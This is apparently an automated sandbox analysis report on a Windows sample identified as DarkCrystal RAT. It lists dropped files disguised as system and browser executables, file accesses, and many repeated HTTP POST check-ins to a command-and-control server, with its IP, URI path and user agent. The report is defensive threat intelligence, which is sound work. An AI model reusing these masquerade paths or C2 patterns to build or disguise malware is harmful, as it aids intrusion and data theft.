Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Joe Sandbox ML: detected
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Joe Sandbox ML: detected
Source: KtMg6d1Ivx.exe | Joe Sandbox ML: detected
Source: KtMg6d1Ivx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Microsoft\d28c056a32d4fc
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\ee2ad38f3d4382
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\886983d96e3d3e
Source: KtMg6d1Ivx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.pdb | source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.pdb | source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 4x nop then jmp 00007FF848F426F6h (0_2_00007FF848F31CA5)
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 4x nop then jmp 00007FF848F426F6h (0_2_00007FF848F31CF2)
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh (0_2_00007FF8490E896D)
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 4x nop then jmp 00007FF848F226F6h (11_2_00007FF848F11CA5)
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 4x nop then jmp 00007FF848F226F6h (11_2_00007FF848F11CF2)
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 4x nop then jmp 00007FF848F426F6h (12_2_00007FF848F424EE)
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 4x nop then jmp 00007FF848F226F6h (30_2_00007FF848F224EE)
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 4x nop then jmp 00007FF848F326F6h (31_2_00007FF848F21CA5)
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 4x nop then jmp 00007FF848F326F6h (31_2_00007FF848F21CF2)
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 4x nop then jmp 00007FF848F126F6h (32_2_00007FF848F01CF2)
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 4x nop then jmp 00007FF848F126F6h (32_2_00007FF848F01CA5)
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 4x nop then jmp 00007FF848F226F6h (33_2_00007FF848F224EE)
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 4x nop then jmp 00007FF848F226F6h (34_2_00007FF848F224EE)
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 4x nop then jmp 00007FF848F426F6h (35_2_00007FF848F424EE)
Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 4x nop then jmp 00007FF848F226F6h (36_2_00007FF848F224EE)
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 4x nop then jmp 00007FF848F426F6h (38_2_00007FF848F424EE)
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 4x nop then jmp 00007FF848F326F6h (39_2_00007FF848F324EE)
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh (39_2_00007FF8490D896D)

Networking

Source: Traffic | Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49711 -> 185.87.199.107:80
Source: Joe Sandbox View | ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1332 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CxrqPI7Urq2ZAKju3VdYIE8dairlKhIZrD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 135114 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1060 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1332 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1060 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1060 | Expect: 100-continue | Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
